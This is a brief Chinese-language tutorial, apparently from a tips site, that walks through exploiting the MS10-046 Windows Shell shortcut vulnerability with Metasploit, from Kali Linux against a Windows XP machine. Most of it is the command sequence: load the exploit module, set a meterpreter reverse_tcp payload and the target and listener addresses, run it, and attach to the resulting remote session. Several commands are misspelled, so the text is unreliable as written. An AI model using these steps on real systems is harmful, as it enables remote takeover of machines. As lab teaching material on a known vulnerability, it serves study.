黑客是如何利用MS10 黑客是如何利用漏洞的 _小知识

一、漏洞介绍
【黑客是如何利用MS10 黑客是如何利用漏洞的】这是Windows Shell中一个公开披露的漏洞。如果显示特制快捷方式的图标，则该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比，将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。

二、资源装备
1.安装好Kali Linux的虚拟机一台；
2.Windows xp 计算机一台。
3.整装待发的小白一个。

三、攻防实战
2.1 在kali中启动MSF 。
打开终端键入命令：msfconsole

文章插图

2.2 配置相关参数
①键入命令：search ms10-046
②复制msf返回的命令前加use：use exploit/windows/browser/ms10-046_shortcut_icon_dllloader
③设置payload: set paylodad windows/meterpreter/revers_tcp
④显示需要配置的参数：show options

文章插图

⑤设置靶机（win xp）IP地址 set srvhosts 192.168.xxx.xxx
⑥设置本机（kali） IP地址 set lhost 192.168.xxx.xxx
⑦运行payload键入命令：exploit

文章插图

2.3 查看接收到的会话，并对靶机实行攻击
键入命令：session -l ，查看会话。session -l x(x为会话id)连接会话。

文章插图